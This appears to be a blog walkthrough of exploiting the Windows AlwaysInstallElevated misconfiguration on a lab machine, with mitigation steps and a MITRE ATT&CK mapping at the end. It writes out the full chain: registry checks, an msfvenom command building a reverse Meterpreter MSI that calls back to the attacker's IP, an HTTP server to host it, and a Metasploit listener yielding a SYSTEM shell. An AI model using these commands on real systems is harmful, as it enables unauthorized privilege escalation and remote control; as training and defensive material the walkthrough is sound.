Nisha P McDonnell

Cybersecurity Engineer

1 minute read

🧠 Summary

In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When both HKLM and HKCU registry keys for AlwaysInstallElevated are set to 1, any .msi file executed by a standard user will run with SYSTEM-level privileges. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.

🔍 Step 1: Confirming Registry Vulnerability

After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated Registry Settings
Registry keys confirming AlwaysInstallElevated is enabled

Both were set to 0x1, confirming the system is vulnerable.

💣 Step 2: Creating a Malicious MSI Payload

On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi
Generating malicious MSI payload
MSFVenom command to generate the setup.msi payload

🌐 Step 3: Hosting the Payload

I used Python to host the .msi file over HTTP:

python3 -m http.server 80
Payload served over HTTP
HTTP server log showing the victim downloading setup.msi

📥 Step 4: Downloading and Executing on Victim Machine

On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload.

Browsing to download the payload
Setup.msi file download prompt
Payload download via Internet Explorer

🧠 Step 5: Listener Setup and Shell Access

On my Kali box, I launched a Metasploit listener to catch the reverse shell:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.2.119.123
run
Meterpreter SYSTEM shell
Confirmed SYSTEM-level Meterpreter shell from payload execution

The payload executed with SYSTEM privileges, as confirmed by the getuid command.

🛡️ Mitigation

To prevent this type of privilege escalation:

  • Set AlwaysInstallElevated to 0 in both HKLM and HKCU: 
    reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
  • Restrict user ability to run .msi installers
  • Use endpoint monitoring to alert on privilege escalations

🔗 MITRE ATT&CK Mapping

  • T1548.002 – Abuse Elevation Control Mechanism: Bypass User Access Control

Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!

Stay sharp, and happy hacking! 🛠️

You May Also Enjoy

Devel Rooted: A Hack The Box Walkthrough

1 minute read

This post is a walkthrough of the ‘Devel’ retired machine from Hack The Box. I gain initial access through an exposed FTP and WebDAV setup, then escalate pri...

LazyAdmin TryHackMe Walkthrough

3 minute read

A complete walkthrough of the LazyAdmin room on TryHackMe, demonstrating enumeration, exploitation, and privilege escalation.

Anonymous Rooted: A TryHackMe Walkthrough

3 minute read

This walkthrough covers the TryHackMe ‘Anonymous’ room. I gain user-level access via FTP and a writable script, capture the user flag, and escalate to root v...